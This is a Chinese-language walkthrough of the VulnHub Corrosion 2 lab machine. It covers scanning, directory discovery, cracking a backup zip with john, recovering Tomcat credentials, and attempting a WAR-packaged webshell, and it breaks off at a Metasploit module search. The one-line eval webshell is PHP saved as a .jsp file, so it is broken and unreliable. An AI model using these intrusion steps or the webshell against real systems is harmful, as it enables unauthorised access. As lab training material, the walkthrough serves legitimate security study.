靶机下载:
https://download.vulnhub.com/corrosion/Corrosion2.ova
实验环境
靶机:192.168.43.4
攻击机:192.168.43.123
工具:
netdiscover 主机发现
nmap 端口扫描
dirsearch 目录扫描
msfconsole 集成工具
unzip 解压
zip2john 提取密码信息
john 爆破
vi 编辑器
信息收集
netdiscover 192.168.43.0/24 arp-scan -l nmap 192.168.43.0/24
三选一即可
发现目标靶机
端口扫描
nmap -A 192.168.43.4 -sS -sV -T4
端口发放情况为
22 /tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80 /tcp open http Apache/2.4.41 (Ubuntu)
8080 /tcp open http Apache Tomcat 9.0.53
渗透思路:
1.OpenSSH 8.2p1
命令注入漏洞(CVE-2020-15778)(高危)
OpenSSH 8.4p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。
(115条消息) OpenSSH 命令注入漏洞(CVE-2020-15778)复现_~TQT~的博客-CSDN博客_openssh漏洞复现
3. Apache Tomcat 9.0.53 版本较高
暂未发现公开漏洞
访问80端口 8080端口
可以尝试弱口令登录试试
登录服务
192.168.43.4:80
192.168.43.4:8080
实战步骤:
1.目录扫描80端口的
python dirsearch.py -u http://192.168.43.4/
并未发现特殊的利用目录
2.目录扫描8080端口
python dirsearch.py http://192.168.43.4:8080/
发现特殊目录,readme.txt,backup.zip
访问看看readme.txt,这句话的意思是在服务器上留下了密码
嘿,兰迪!它是您的系统管理员。我在服务器上给你留了个文件,肯定没人能找到。记得用我给你的密码。
访问backup.zip
发现下载下来一个压缩包文件,试着破解他
3.破解压缩包
cd download ll unzip backup.zip //密码未知
使用破解工具暴力破解 zip2john backup.zip > password_hash.txt john --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt //注意,需要建rockyou.txt解压,不然无法找到
由此可以破解出backup.zipde 密码
@administrator_hi5 (backup.zip) 解压backup.zip unzip backup.zip ll
可以看到tomcat的 tomcat-users.xml 文件
打开看看
cat tomcat-users.xml
发现tomcat的账号和密码,用这个登录tomcat服务
user username="manager" password="melehifokivai" roles="manager-gui"/> user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
4.登录tomcat尝试上传war包反弹shell
新建一句话木马shell.jsp <?php eval @eval($_post['shell']) ;?> 打包成war包 jar cvf shell.war shell.jsp
上传war包
反弹shell
访问shell失败,说明无法远程解析连接
重新换一种方式反弹shell
漏洞攻击
1.利用msf 的Tomcat 上传webshell的模块,有用户名和密码就可以使用:
msfconsole
search tomcat upload //搜索攻击模块
